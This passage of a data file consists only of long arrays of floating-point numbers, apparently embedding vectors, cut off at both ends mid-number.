032,0.04622725,-0.008653237,0.017241294,-0.03341113,0.02707408,-0.00039271225,-0.011855817,0.07758905,0.0039055613,0.013347705,0.039743606,0.054610956,-0.07155318,0.024011778,0.031904586,0.05830013,-0.007226782,-0.041588664,-0.008220013,0.025550213,0.0029459589,0.0022413796,0.003960217,0.0374991,-0.01306226,0.040706575,0.047409162,-0.0028234776,-0.032436974,0.01770601,0.010038258,0.031258218,-0.026354358,-0.04497269,0.065874755,0.020062003,0.002214888,0.06197713,-0.011084143,-0.030653728,-0.030086666,0.08113955,0.014045502,0.02458558,-0.05019236,0.04925727,-0.0014836716,-0.017692875,-0.0073785577,-0.032496,-0.01135766,0.023900233,-0.00501021,0.04709923,-0.038261797,-0.06400368,0.017841585,-0.0038510289,0.02560914,0.068577014,0.02375539,-0.0018656193,-0.0129157165,-0.018917661,-0.020917512,-0.04813413,-0.031752687,0.025357649,0.0055362843,0.012604384,0.033977564,0.01828055,0.053032145,-0.015185584,0.0547788,-0.0039586197,0.029152064,0.068648614,0.026725614,0.0058652596,-0.05698363,0.04663883,-0.0286908,-0.05377276,0.02732034,0.09265805,0.012796596,0.029374184,-0.05874137,-0.033711758,-0.021843625,0.011396936,-0.011544719,-0.0453155,0.023117712,-0.05647731,0.022287454,-0.018459376,0.035070427,-0.016107388,0.051715113,0.057450835,-0.033589885,-0.028464472,0.021293923,-0.0016633599,-0.011495721,0.002575864,0.020705814,-0.010546827,-0.07517213,-0.027477479,-0.01228068,-0.024990458,0.06407811,-0.035303436,0.026831314,-0.03268827,-0.07786438,-0.0024193982,-0.034974355,-0.008410493,-0.061389554,-0.016310576,-0.0027858743,0.050150372,-0.010047957,0.0058723995,0.044323068,0.0003081988,-0.040054716,0.003114659,0.008834077,-0.014219568,-0.007851005,-0.013906222,0.002656991,0.0051180585,0.015750121,-0.016147424,0.048346817,-0.05118934,0.049239095,0.0021684722,-0.006903787,-0.01999831,0.0023307165,0.03601791,0.005890893,-0.03767449,0.04417508,0.026646083,-0.03460508,-0.01749586,0.014924458,0.08238094,-0.015617322,0.00025444257,0.01673491,0.018970728,-0.030426037,-0.041677557,-0.054631695,-0.033248678,-0.015529599,0.019380376,0.016051577,0.052129693,-0.011369859,-0.024171641,-0.004891869,0.037930574,0.06525155,-0.0347739,-0.00986392,0.011110033,-0.066815905,-0.028118424,-0.00047712383,-0.018199414,0.043656502,-0.0979608,0.0018906089,-0.036027394,-0.03973407,0.017464882,0.081042856,0.028433086,0.029548619,0.043431934,0.047574814,0.02477418,-0.008108092,0.014372509,0.055243053,-0.035564274,-0.03631213,0.024910314,-0.08841869,-0.04724513,0.028035,-0.043216534,-0.015287294,0.009699704,0.005243557,-0.00070570456,0.001271519,0.00081469835,0.030245762,-0.021870526,-0.0007447298,0.0412686,0.0021940046,0.019710714,0.05196462,-0.03069473,0.057868253,-0.026045596,0.028152585,0.03463372,0.02898195,0.061204623,-0.028558813,-0.018150646,-0.008226042,-0.009260987,0.012969747,-0.029264295,-0.017194033,-0.0022501664,0.019981155,0.04482576,-0.05042857,0.036017034,0.06386432,0.017789325,0.022220267,0.0017673989,0.014958541,-0.004930317,0.0043048933,-0.051570177,0.010952816,0.04492384,0.005281075,0.05226125,-0.037048552,0.010204257,0.018898183,0.0049984134,0.022898598,-0.032385997,-0.08045967,0.035344455,0.010822921,0.012275886,-0.0010795795,0.032638147,0.013474944,0.00030975396,-0.00575646,-0.06708544,0.02490672,0.007447931,-0.028067233,-0.02013954,0.039308984,0.034765277,-0.043561414,0.04241047,-0.021385092,0.008266973,0.0074820556,-0.0038967216,0.0015383171,-0.003280885,0.023431545,-0.013554077,0.055186402,0.039197594,0.03461908,0.03452619,-0.008219791,0.004676474,0.012134729,0.022947388,0.046991877,0.0088615995,-0.03771048,-0.024249773,0.029891137,0.03993612,-0.004890227,-0.0005121956,-0.07645752,-0.0033313509,0.0067326077,0.03414856,0.056083165,-0.07738396,-0.024510833,0.0046407767,0.010153133,-0.047033597,0.0064757345,-0.017992416,0.02410308,0.012161391,0.03290807,-0.04240035,-0.040431015,-0.0022891224,-0.019726401,-0.033243954,0.031230986,0.005710477,-0.0016875726,-0.00011211839,-0.05167162,-0.037108593,0.0135289375,-0.010668787,-0.015104358,0.01382219,-0.069788136,-0.026409298,0.06177968,0.019151093,0.0043784347,-0.011140194,-0.0008054915,-0.036611658,-0.00065199396,0.02309531,0.057835024,0.040915348,-0.04188256,-0.049142666,0.0019978313,0.031726524,-0.013861149,0.0069957315,-0.01009868,0.046511225,0.052293587,0.0526716,0.04569772,-0.047229,0.014306842,0.010564365,0.0261293,0.007543509,-0.029107975,0.011062166,0.0038206533,-0.0038276608,0.03578139,-0.0001809595,0.0075060315,-0.018473512,-0.047255304,-0.049045015,0.017558638,0.10298589,0.07507198,-0.04620928,-0.047833603,0.030479481,-0.01501687,-0.04748606,-0.018695006,-0.0024794005,0.08551209,-0.012382717,0.002072173,-0.0013996764,0.068342954,0.002516247,-0.016141381,0.07952676,-0.016376652,0.023432547,0.02182561,0.00475403,0.03366812,-0.019754339,0.027149962,0.07132411,-0.08486785,-0.03106932,0.019409586,-0.028147468,0.03278757,0.033237956,0.0026075507,0.02509411,-0.049117833,0.0021030414,0.009894542,-0.0066931364,-0.04910794,-0.09165818,-0.009766623,0.03238317,-0.0070467326,-0.01172324,-0.015235627,-0.0047216956,0.025798175,0.014118326,-0.024308776,0.01307166,0.046923995,-0.027908789,0.00064425264,-0.010997168,0.029787103,0.008329084,0.032358307,0.022928633,-0.00022533903,0.020817684,0.011027859,0.001968354,0.004690842,-0.047297206,-0.063616395,0.02578969,-0.004400529,0.013734371,0.054787315,0.0057592993,0.06315985,-0.0761185,0.053475894,-0.021584352,-0.04123297,-0.010946432,0.07450645,-0.02553606,-0.004805606,0.04440994,-0.05948258,0.0027280853,-0.0022857864,-0.01562053,-0.003312713,-0.0393797,0.011543192,-0.023018904,-0.003762506,-0.050753746,0.002878991,-0.010967241,-0.0323032,0.032852586,0.016278973,-0.0054747825,-0.007521305,0.0035441776,0.0056132465,-0.018605625,-0.008528678,-0.032478813,0.0073703295,-0.009692688,-0.037576813,-0.054746963,0.019542536,-0.030743366,0.017337471,-0.0385733,0.040254615,-0.035699673,0.009666079,0.011383043,-0.0040509994,-0.020143075,0.019865468,0.029260186,0.078454755,0.025211053,0.024630867,-0.040195122,0.014259334,0.0288097,-0.0084376475,0.036484085,-0.037148137,-0.041191496,-0.015159972,-0.015063048,0.0053491015,0.015818328,0.034378048,0.007549658,-0.029375061,-0.044480074,-0.024187494,-0.028520882,0.012269001,-0.013975444,-0.029845612,-0.008845791,-0.023947174,-0.019598026,0.039729375,-0.05158275,-0.022678437,-0.03436962,0.032721423,-0.025537973,-0.01477784,0.013094253,-0.03213421,-0.0195467,-0.011679373,-0.037292752,0.013131895,0.01591835,0.05849112,-0.043767035,0.00071593066,0.03590975,-0.01953325,0.011943357,-0.0683511,-0.02380442,0.036343016,-0.023636898,-0.0044524884,-0.04319444,0.038459472,-0.050521426,0.055625413,-0.016450236,-0.034796294,-0.034400336,-0.0019779948,-0.034682978,0.08017212,-0.04201421,0.08922346,-0.014509237,0.047175497,-0.04646167,0.036516424,-0.006994716,-0.018641368,0.04482273,-0.06731665,-0.09606787,-0.046049304,0.03720011,-0.054756764,0.034148127,0.027019221,0.045128405,0.065893665,0.0029304263,-0.025398588,-0.031450547,0.033593904,-0.0024476927,-0.0027518633,0.01795303,0.03486645,-0.0023550845,0.061095804,0.058991652,0.030718919,-0.0202173,0.037887026,-0.0055570137,0.036487084,-0.020153897,-0.022063185,-0.041301556,-0.025618436,-0.011970066,-0.01227432,-0.033446554,0.052561805,-0.02774939,-0.03932576,-0.004925367,-0.07904636,-0.047847286,0.023904074,0.03106089,-0.037775483,-0.00006749611,0.053177286,0.0083773155,0.023875289,0.018939205,-0.010999164,-0.010049987,0.020968452,0.013496351,0.026202505,0.017735416,0.036752116,-0.068052776,-0.03242812,-0.012672452,0.0014259131,-0.011175023,0.01468349,-0.065681174,0.020156827,0.030547088,0.008261507,0.011516982,-0.048708603,-0.042121112,-0.018727181,0.050885513,-0.013190162,0.037388615,0.0014454129,0.07384016,-0.0015842014,0.008465956,-0.024733154,0.0006970318,-0.012036433,-0.04240409,-0.030479632,-0.0076762866,0.021982381,0.014323129,0.0032987376,0.018018525,-0.024892285,-0.023247687,0.0019195941,-0.017545607,0.050528232,0.006102943,-0.028123481,0.0045835576,-0.016734418,-0.0107542025,0.030527493,-0.003598052,0.03433568,-0.023083817,-0.0037384755,-0.026997488,-0.052383583,0.05716013,-0.029462844,-0.022210913,-0.038754925,-0.009358357,-0.056031287,0.012275001,-0.06043176,-0.011058188,-0.019158736,0.022633178,0.000080486,-0.003213486,-0.023976518,0.039771855,0.016646683,-0.03507686,0.07764184,-0.0625079,-0.060335483,0.026692653,-0.04436252,-0.015975395,0.06283718,0.0063957754,0.0923849,-0.014919348,0.017891593,-0.05494049,0.020819832,0.009438211,0.0083781835,-0.059018876,-0.012938842,-0.040203013],[0.04344687,0.018504476,-0.17645563,-0.043807212,0.07968592,-0.09406317,0.009625435,0.019380448,-0.017818209,-0.044614647,-0.012133212,0.017166464,0.034383696,0.016193924,0.010751527,-0.017403252,0.01651192,-0.016897606,-0.06286757,0.023731848,0.0028162159,-0.04531657,0.01247721,-0.01732074,0.09014862,0.00976351,0.0020710537,0.015779257,0.0023034716,0.047524724,0.022436738,-0.03476468,-0.031172575,0.01566462,-0.07656219,-0.06696376,0.02207831,-0.011873057,-0.05221427,0.004479259,-0.046526704,-0.041489515,0.011320693,-0.03626542,0.03937908,0.011094719,0.11597049,0.0139764855,0.03738062,-0.08431984,0.058264077,-0.013178126,0.039580666,-0.014485294,0.087468974,-0.0054921876,0.018230423,0.0099977,0.012482159,-0.017541735,0.064323485,0.09876039,0.0032726955,0.06478945,0.012807986,0.0070909588,-0.037286587,0.036178656,-0.0049668932,-0.05082083,0.064754866,-0.019526927,0.0015283793,0.0139125995,-0.0070478762,0.041113835,-0.018733718,-0.07641777,-0.019680385,0.024734853,0.0057285465,-0.035464287,0.06234308,0.0039015138,0.030865038,-0.010513144,-0.006022641,-0.005335361,-0.00763844,-0.0019049145,0.01755766,-0.02444166,0.050399072,0.05999444,-0.102462925,-0.006441128,0.015705045,0.05331477,-0.046292596,-0.006722019,-0.0075684087,0.0022975057,0.05007066,-0.0067542954,-0.02386291,0.0742959,0.046869047,0.01945326,0.055230383,0.03200264,0.0086017605,0.046549384,-0.016875476,-0.011470677,0.028763844,-0.045298662,0.018207617,0.0059151063,-0.013759462,0.053309217,0.030690342,-0.054684646,-0.0022190243,0.040776923,0.024848567,0.04956437,-0.025010709,0.014467133,0.00488465,-0.06380916,0.0045025055,-0.028858488,-0.03888681,0.020510327,0.06794682,0.0363202,-0.049536154,-0.019486114,0.009010841,-0.007119178,0.011472258,-0.0130383475,-0.0077459184,-0.010415799,-0.0104900785,-0.01594304,0.002059019,-0.012365337,-0.06449791,0.055409595,-0.06791509,0.04812335,-0.01857334,0.032888465,0.07121189,-0.029893704,0.010286689,-0.034989107,0.004197758,0.054779336,0.00567307,0.00077074853,-0.031819645,0.056377906,-0.036738224,-0.06475112,0.03525472,0.066963606,0.031173129,-0.035038892,-0.063640185,-0.026802557,-0.004356525,-0.023869393,0.00032687047,0.023241578,0.032656558,-0.004302944,-0.0026518812,-0.016634863,0.00012134726,-0.053066235,0.03669534,0.034806326,-0.0147156045,-0.0061251074,0.030668445,-0.015076795,-0.0061051655,-0.0046444857,0.022021819,-0.0022175508,-0.032130584,-0.036347877,-0.031038173,-0.05799398,0.01155788,-0.017811261,0.03690828,-0.020115308,0.003041543,-0.0068326406,-0.0033038096,-0.018641617,-0.05981482,0.04151525,-0.011839218,0.005702089,-0.01437053,0.0494889,0.082306035,-0.015094999,0.0011985725,-0.034591936,-0.03715608,-0.011104383,-0.017707136,-0.027132483,-0.020635802,0.0024246897,0.01998151,-0.020701652,0.010516804,-0.0068002786,0.04807059,0.021856418,-0.020728396,-0.013466508,-0.009240966,-0.008487824,-0.051022843,-0.067085855,0.017145282,0.008472958,-0.010432393,0.0077085937,0.007190996,0.075160526,-0.008728902,0.05871335,0.0065527945,0.051541977,-0.015194152,0.007151609,-0.04027979,0.02357185,-0.0072249724,-0.0020797956,-0.016513452,0.019797182,0.024286175,-0.00078955357,0.017076796,0.03755191,0.04672921,-0.058000397,-0.036054347,0.02339819,-0.024871852,-0.00012521134,0.024292799,0.0064213644,-0.0025477475,-0.051143035,-0.007650322,-0.09483744,-0.043475047,0.009922959,-0.024237158,-0.00037947463,-0.021742381,0.00765871,0.039822206,0.032761693,-0.008059191,0.0123884715,0.061207462,-0.015278654,-0.022019098,-0.024023972,-0.06455182,-0.0022382275,-0.0045694807,-0.0074342326,-0.00037843818,-0.01268697,-0.01550908,-0.060816143,0.004557436,-0.029753799,0.03028119,-0.04585575,-0.01467856,0.03851819,0.00007280573,-0.0013038988,0.037027154,-0.02708882,-0.014633597,-0.031941745,0.048037954,0.03052515,-0.006099678,0.036049444,-0.049549382,-0.009437667,0.049255285,-0.0013513169,-0.038864303,-0.0054236297,-0.057644404,-0.00026955517,-0.016855467,0.02663053,-0.05293087,0.057852108,0.036402985,-0.027381368,0.0108896615,0.0014910533,-0.015079631,-0.038703937,0.0070164497,-0.0218638,-0.01694818,0.06291107,-0.025289496,0.036733635,-0.005173545,-0.021046706,0.026817687,-0.014779824,-0.0021839102,-0.045461897,-0.023354597,0.051453654,-0.0041524856,0.021563945,-0.014315039,0.024961341,0.0044774637,-0.02180218,0.0044170446,-0.014872047,-0.030508624,0.015247903,-0.06993123,0.01181591,0.073865175,0.012934943,-0.0482741,0.0006550266,-0.0048185503,-0.018753413,0.0184938,-0.010335479,0.03488164,0.019091053,-0.021516345,-0.019568088,0.034612797,-0.0026900733,-0.0012273564,0.031021291,0.005391525,0.0454131,0.049806196,0.010827141,0.0025061881,-0.020337751,0.0060381456,-0.013188621,0.014761965,0.037725896,-0.042403016,-0.008034761,-0.08251288,-0.0030681023,-0.0036794636,0.048389744,0.0051342337,-0.045198783,0.0004978491,0.06817385,0.044179413,0.006376624,0.038850922,-0.0043798215,-0.018780777,0.035494633,-0.039441716,-0.026983913,-0.01603095,0.018995086,0.00029488697,0.0077802367,0.0020636392,0.0026008217,0.039355934,0.022012886,-0.0011412675,-0.072959,0.047632676,0.015835185,-0.013727117,0.0038481117,-0.035749894,-0.037695896,0.081157155,-0.00543499,0.05190726,0.0138519285,0.0042144186,-0.045881595,0.015727028,-0.015334899,0.11564291,0.01382418,0.016488465,0.0014946443,0.0019780402,0.010040453,-0.020527862,-0.015750425,0.008497585,0.043396313,0.008247928,0.024237882,0.013392466,-0.08813447,-0.00794945,0.031059397,0.0071227383,-0.030844068,-0.03606878,-0.037874598,0.011823061,0.022034721,0.013033073,0.04591307,0.056232862,-0.038050197,-0.07019445,-0.042835813,0.0039093895,0.08046291,0.09525284,-0.068392284,-0.011621013,0.026753897,-0.032281574,-0.02597633,-0.002612174,0.012704073,0.12619449,-0.013638299,0.011071926,-0.017358284,0.002459449,-0.016874446,0.024946954,0.01846194,-0.0529643,-0.022346964,0.01443975,0.048482228,-0.039181974,-0.057037152,0.045641575,0.084186465,-0.06707058,-0.05232304,0.0403915,-0.013775324,0.06113785,-0.02073834,-0.01068839,0.00044185523,0.010039154,0.084992595,-0.0034309905,-0.04461191,-0.018850807,-0.057306945,-0.023131771,0.05690275,0.007744306,-0.03642533,-0.018213214,-0.019168615,-0.021384211,0.046724785,-0.00904494,-0.014542194,0.0065695317,-0.010973814,-0.009014159,0.018196832,0.036550637,-0.031428594,0.06925607,0.02237965,-0.02623618,0.052926775,0.043523766,-0.020598177,0.06346376,-0.044403955,-0.046827335,-0.062902436,-0.01320224,-0.029011741,0.009687197,0.020519778,0.08538922,-0.066252224,0.012985808,0.0054941745,-0.047507394,-0.008611865,0.0056297476,-0.013291809,-0.037332464,-0.026699934,-0.03452743,-0.004916336,0.0070181736,0.008272408,0.038414788,-0.020742567,0.0108176535,-0.04428315,-0.036390185,-0.0290693,0.07184905,0.009583852,-0.016943485,0.008550365,0.019152386,0.0012062778,-0.0010506533,0.014023472,0.020911397,-0.0031933999,-0.01382533,-0.047426578,0.021104615,0.057635807,-0.018917155,-0.0016382908,0.033624217,-0.029341655,0.0013218812,-0.02289838,0.035843644,0.029011711,-0.0062725716,-0.043602858,-0.046705294,-0.03629548,-0.016488539,0.006188959,0.06019051,0.0327073,0.0051633245,-0.057747237,0.012320378,0.031116718,0.011910808,0.073102586,-0.019018227,-0.0053002997,-0.044609595,-0.00483727,0.025114689,0.015431742,0.018485375,0.0313706,-0.022179583,-0.016488358,0.06525262,-0.043728672,0.031098763,0.027384026,-0.01923542,0.02136946,-0.020455534,-0.046981808,0.035664167,-0.0627273,-0.016936064,0.045079153,0.031259373,0.015583636,0.02180471,0.039313197,-0.05428648,-0.007453204,-0.009569765,-0.04812284,-0.0016879418,0.0149083575,0.067839175,-0.054324754,0.004626637,0.0614723,-0.0147105865,0.01143037,-0.013135706,-0.034538705,-0.010922451,0.013251924,-0.0178304,-0.02313371,0.012141897,-0.009185646,0.03254364,0.005952501,0.0051674284,-0.040907923,0.0032443171,-0.018121036,0.030199254,-0.045279734,0.0071907165,-0.0069163903,-0.00452222,-0.06606794,0.016957678,0.016233657,-0.04757239,0.04838597,-0.035012875,-0.081153914,-0.09128128,0.0140311085,-0.0131635675,0.03863085,-0.024657533,0.038994227,0.06305031,-0.030113379,-0.03197197,-0.0022513606,0.020200474,-0.0479837,0.02210004,0.036418144,0.07132399,0.029642023,0.072981715,0.061405115,0.033377685,-0.0062149414,0.029712738,-0.02801786,0.022729231,-0.05684828,-0.083404444,-0.04061812,-0.03360106,-0.0092567345,-0.011357765,-0.012827275,0.01860508,-0.019313648,-0.008388582,0.026963476,-0.057202943,-0.032027908,0.017769584,0.025370521,-0.030640043,-0.030984657,-0.013426067,-0.033612024,0.0659755,0.04897094,-0.050198082,0.007877486,0.015088825,-0.012554013,0.06947593,-0.04047925,-0.016149165,-0.08370071,0.002647531,0.0026365519,-0.045430865,-0.022589697,-0.03602482,0.02171624,0.0074727284,-0.022315191,-0.018302212,0.025767224,0.027319036,-0.03410658,-0.04607315,0.07751701,-0.020431437,-0.014899029,0.01126352,0.02312908,-0.008710739,0.030115895,0.0024069073,0.011902868,-0.039286193,-0.007345875,-0.021210218,0.01919022,-0.025007658,0.037396308,0.036772523,0.051360115,0.021049105,0.0012482831,0.02481297,0.012236725,0.033374906,0.00048444167,-0.046208635,-0.020184439,-0.049729563,0.013598619,0.015814796,-0.025210543,0.0067434,-0.0034245965,0.012356575,-0.025924241,0.0037464094,0.02425541,-0.008701635,-0.009317948,-0.056894988,-0.0029867215,-0.0683132,-0.017912855,-0.025337623,0.00024154631,-0.038451448,0.009978883,0.012598963,0.04448008,-0.0011574948,0.045896664,0.004744898,0.013955356,0.06964337,-0.02314146,-0.009855286,0.03601862,-0.019776704,-0.0059742783,0.00024183844,0.050463285,0.08904891,0.024496855,0.04125479,-0.03367057,-0.012144802,0.033155035,-0.017440747,-0.0409507,-0.009768365,-0.028987447],[0.0023954012,0.04730947,-0.13343748,-0.0343035,0.08544645,-0.09156294,0.003090883,-0.01813512,-0.059773646,-0.019110348,-0.040025115,0.054547142,0.07209924,0.030568454,-0.040190633,-0.050240766,-0.033226654,0.0023916855,0.013171193,-0.0117329955,0.015496276,-0.034335397,0.016161822,-0.048451528,0.11290533,0.039616067,0.07264696,0.009729237,-0.028247584,0.053324997,0.047853656,0.016768148,-0.00633239,0.030925138,-0.10288279,-0.04062091,0.033470724,0.005050372,-0.019702975,0.018418893,0.0011830395,0.026135357,-0.0042787506,-0.020696724,0.018967435,-0.008490773,0.07254258,0.019500313,0.076355584,-0.10800771,-0.019719802,0.0116904145,0.0007049601,-0.032271754,0.07865683,0.048352234,0.00678891,0.051967543,0.0034290943,-0.0053614527,0.06557598,0.011772643,0.0026356434,0.07594002,0.028230153,-0.0105204135,-0.039907612,0.034384042,0.0038300436,-0.05899602,0.029413223,0.002714807,-0.03350015,-0.0053290585,-0.002515849,0.005138998,0.0021398074,-0.01096007,-0.028032292,0.040084615,-0.017895056,-0.023762815,0.048492566,-0.008478321,0.053029377,-0.009507054,-0.046846036,0.0028186594,-0.007514021,0.0045942976,-0.039108355,0.009378244,0.008281319,0.059395548,-0.06918129,0.024071071,0.017024577,0.019986156,-0.04210784,-0.03710464,0.010663499,0.0015376117,0.015398811,-0.0012798044,-0.006807308,-0.008168886,0.039317764,0.024273101,0.01182003,0.0060850214,0.013885521,0.037737392,0.0025226686,-0.006564235,0.01494896,0.017379602,0.013747375,-0.025477491,-0.02204658,0.056085028,-0.00037138734,-0.016645718,0.03103561,0.04386449,0.032507338,0.023843154,-0.020192884,0.017947946,-0.034953967,-0.03939524,-0.04343242,-0.02330434,0.025814997,0.05748855,0.011185191,0.025934432,-0.07048019,-0.02092074,-0.0059933797,-0.013024183,-0.009323552,0.03590589,0.032910977,-0.014652109,-0.02607912,-0.047480643,0.0026286638,-0.032438908,-0.05476133,0.022587696,-0.023139818,-0.000523284,-0.007067819,0.011719476,0.03702846,-0.0007408193,-0.020132504,0.025743233,-0.010194069,0.02736416,0.0010933166,0.032008316,-0.039327238,0.03630542,-0.014272522,-0.06259791,0.0091090575,0.029539289,-0.010190063,0.018774664,-0.048177343,0.0056798025,-0.041724455,-0.05413753,-0.02341778,0.030348111,0.018574804,-0.01252568,0.053976443,0.0037213482,0.052285764,-0.034885455,0.07935223,0.012863111,-0.07501581,-0.00006429685,0.0066219484,-0.060427483,0.027192384,-0.070574075,0.026299028,-0.036994096,-0.07367327,0.010114155,0.007342293,-0.034866128,0.021913763,-0.013406223,0.00480534,-0.055766553,-0.030074643,0.002640671,-0.0026823943,0.018101007,-0.021533558,0.034206852,-0.010304743,0.022719007,-0.010680011,0.036662385,0.068856604,0.024061304,0.013321871,0.00049528683,-0.03581416,-0.030766215,0.032277286,-0.058170322,0.00041548736,-0.010564812,0.010068872,0.007318011,-0.0038499762,-0.020068144,0.049946073,0.06305786,-0.006113424,-0.009626185,-0.009461774,-0.01663472,-0.0626111,-0.09898362,0.040111702,-0.02374407,-0.009354382,0.011438393,0.01604827,0.109046526,-0.030492209,0.020620225,0.05206715,0.013613021,-0.01496976,-0.01199936,-0.031202707,0.0020483017,-0.052733,-0.042512175,-0.04691732,0.032073215,-0.024627507,0.025122188,-0.015358562,0.046323895,0.07466408,-0.06924152,-0.0031081468,-0.008923402,0.021037627,-0.014897539,0.0044024475,-0.0011184546,0.013438428,-0.065669104,-0.01989147,-0.10297487,-0.034045406,0.01593004,0.009472792,0.0017841964,-0.006997222,0.032872148,0.0062786606,0.050304353,0.0400664,0.019339671,0.034111764,0.027635088,-0.04217753,0.012160575,-0.060023125,0.014905732,-0.045184825,0.044633947,-0.017022954,0.011789831,0.0134878745,-0.020913577,0.030889867,-0.022976885,0.05845758,-0.043939665,-0.012237101,0.036946595,-0.035178628,-0.025826346,-0.002714407,0.021020867,0.06183553,-0.036980722,-0.0023504046,0.0518889,0.026774079,0.029595515,-0.02165016,-0.041830465,0.043041136,-0.026316723,0.02671739,-0.018604528,-0.023621429,-0.011607164,-0.027785482,0.013328075,0.0025054277,-0.010814625,0.027536225,0.012591189,0.035836715,-0.0025952829,-0.016170215,-0.060820147,0.02078697,-0.027722849,-0.0443564,0.049060956,-0.005648048,0.037428543,-0.020990415,-0.00788283,0.011869486,0.025022909,0.06798013,-0.01984131,0.013264581,0.015709355,0.013423428,-0.037684392,-0.011303852,0.06277494,-0.0067300783,0.0074299676,-0.007317938,-0.04690964,0.017016858,0.0632935,-0.055815767,0.02071585,0.03790388,0.010824881,-0.04392717,0.008681223,0.0007283611,0.008310123,0.025650978,-0.013039656,0.012137966,0.007677182,-0.0015296906,0.015329181,0.053796314,0.040513527,0.010155328,0.0069916374,0.014245848,0.07029882,0.04562357,0.0072262897,-0.01667838,0.021815328,0.005990567,-0.042867642,0.027876003,0.027177325,-0.03333413,0.0041486206,-0.055744268,0.015880315,-0.008145508,0.031490453,0.0127071645,-0.045457326,0.017852375,0.006128846,0.022444135,0.008845998,0.048745606,-0.005857676,0.0045506833,0.0722023,-0.029500037,0.010270764,-0.031743333,0.023873404,0.014085778,-0.015359838,0.017597029,-0.0039895526,-0.0400248,0.0521523,0.015062713,-0.03643691,0.033789974,-0.006103197,0.012643734,-0.0032141781,-0.030557401,-0.0022956438,0.07939119,-0.011080213,0.04301498,0.019666364,0.023974389,-0.05093825,0.030510094,0.003240466,0.107771344,0.013507786,-0.033312004,-0.04676125,0.047048092,-0.0013879611,0.019925958,-0.017376417,0.010059751,-0.01150507,0.016921734,0.06604869,0.03936188,-0.059642833,0.0046600625,0.028688721,0.027733019,-0.010518657,-0.018850612,-0.01743219,0.015693787,0.023285447,-0.0032871475,0.03333724,0.018195212,-0.0016940773,-0.021307202,-0.029792111,0.010942843,0.07019273,0.07952669,-0.036028564,-0.077251926,0.07874866,0.04185652,0.0143382205,0.012399386,0.011229728,0.095319316,-0.006540636,-0.017234927,-0.0074897953,0.028966613,0.035483003,0.0004704509,0.0075484146,-0.07866617,-0.002896852,0.047486607,-0.03398138,-0.011499719,-0.03111777,0.06236007,0.059080448,-0.040407848,-0.0067167818,-0.009836226,-0.02514066,0.024045974,0.020762261,-0.021903088,0.0069827083,-0.04634948,0.030254949,-0.011318496,-0.09080267,-0.045689687,-0.056280814,0.0007333495,0.04507055,0.019303264,-0.033304784,-0.017544892,0.018950634,0.003576139,0.011931233,0.0054521114,-0.0005677196,-0.025056995,-0.062399898,-0.0046243197,0.018834643,-0.010925294,-0.017077079,-0.004503339,0.042037684,-0.034500625,0.034604423,0.030220622,0.005515524,0.06881462,-0.057796117,-0.0588357,-0.07976505,0.02069504,-0.036851127,0.021466712,0.021384796,0.014251229,-0.034391165,-0.0011202925,-0.031255294,-0.07758341,0.030536775,0.011518033,-0.029527038,-0.038592137,-0.008076055,0.018487284,0.007957457,0.03448323,-0.044460617,0.019845322,-0.009158267,0.013873415,-0.06461604,-0.052709,-0.03916109,0.041041765,-0.031123418,-0.0077724997,0.030286169,0.049556293,0.0034142314,0.029417206,-0.0031775942,0.0034513406,0.022987891,-0.039458897,-0.028109346,-0.035594936,0.05343689,-0.015335631,-0.03781487,0.04466609,-0.057691343,0.025961043,-0.047813028,-0.0076345215,0.008171713,-0.014108483,-0.00082842255,-0.04107206,-0.043672264,-0.034053665,-0.00080655,0.018610848,0.035100877,0.0124701345,-0.01860037,-0.01438995,0.030394292,-0.00362054,0.012869303,-0.023688791,-0.056676924,-0.016493216,-0.005314478,0.009077974,0.024825146,0.0030603672,-0.0054074675,-0.03947639,-0.03053764,0.009326195,-0.04711737,0.004362139,0.041651428,-0.017216142,0.017722303,-0.039476592,-0.05606129,0.01372964,-0.051499873,-0.040110514,0.014323626,0.02329678,0.01131638,-0.019225579,0.06081393,-0.034934264,0.013579859,0.0001392912,-0.033958793,0.0063687055,0.020120185,0.045517545,-0.041612692,-0.018857982,0.08592227,-0.018646365,0.022479724,-0.030424414,-0.061723832,0.0022024799,0.025335303,0.0015853622,0.0063435026,0.019273369,-0.047669534,0.02372657,-0.01666987,0.0074754045,-0.03331677,-0.04418032,-0.039999254,0.017696917,-0.04194468,0.06904842,-0.042619962,-0.045089316,-0.045619905,-0.026148777,0.031847842,-0.025843268,0.033281066,-0.075578324,-0.05577373,-0.11313747,-0.032131888,-0.008030438,0.024855766,-0.049856395,0.024205947,0.029479994,-0.045376744,0.00722221,0.018303754,-0.00028861102,-0.048654445,-0.016118713,0.010719697,0.048502438,0.013139894,0.04969114,0.07718573,0.021386428,-0.0017567091,-0.01221748,-0.030199077,0.021289647,-0.0021540017,-0.039324123,-0.027928058,-0.021529172,-0.019231655,-0.028579041,-0.006013555,0.024753088,-0.0182504,-0.009870974,0.037001874,-0.043193106,-0.073202774,0.024004076,0.034427933,0.01288658,0.0061318697,0.00012873835,0.009347605,0.047423463,0.04813372,-0.03918694,0.000109019835,0.029787047,-0.00771317,0.071136616,-0.01311924,0.014840851,-0.032609202,-0.018256614,0.0077013094,-0.12142764,-0.04678177,-0.010682045,-0.06556347,0.028984955,-0.035866056,-0.013860217,0.033319294,-0.024053384,-0.031668,-0.073211335,0.052031424,0.00865005,0.03245587,0.04473362,0.012408381,-0.004428943,-0.0067693787,0.01317362,0.033466034,0.0029992408,0.0037360052,-0.065319866,0.055624448,-0.031395,0.04321437,0.000047841895,0.0459441,0.03800075,0.0152886,0.016002,0.030246472,0.019426057,0.007575933,-0.048628684,0.04627252,0.009752301,0.0103378035,0.018584786,-0.0013824864,0.06699658,0.009966066,-0.012196711,0.0012570412,-0.02747998,0.07872994,0.0063159466,-0.03247701,-0.03401274,-0.00992808,-0.036781184,-0.023058757,-0.027373657,0.02946641,-0.0044780695,0.024671668,-0.022771338,0.0016963488,-0.060420394,0.02962194,-0.010401636,-0.017332457,0.047990646,-0.0066638677,0.010948405,0.03549193,-0.042954393,0.0394169,0.016752155,0.004057249,0.12703189,0.029123982,0.05892455,-0.025722748,0.010390543,0.01126161,0.0010782494,-0.0611465,-0.0012612928,-0.054657847],[0.025018696,0.0022783768,-0.15598552,-0.06706214,0.061728034,-0.05688849,-0.012910493,0.048522983,0.018781366,-0.022534618,-0.067513205,0.08949887,0.0483631,0.030838035,0.026830476,-0.02454239,0.010642508,-0.059044145,-0.02549754,-0.03910156,-0.031460386,-0.030588575,-0.0073139006,-0.015839862,0.118573114,0.030665169,0.018646562,0.027404439,-0.01894806,0.02005853,0.011765692,-0.018935591,-0.012824238,0.024465661,-0.055798046,-0.046345238,0.07284229,-0.000706131,-0